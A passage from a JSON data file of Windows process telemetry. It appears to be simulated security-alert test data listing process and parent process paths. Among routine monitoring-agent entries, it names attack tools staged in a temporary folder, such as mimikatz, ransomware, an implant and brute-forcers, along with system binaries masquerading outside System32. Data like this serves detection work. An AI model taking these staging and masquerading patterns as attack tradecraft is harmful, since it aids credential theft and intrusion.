\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"ParentProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring 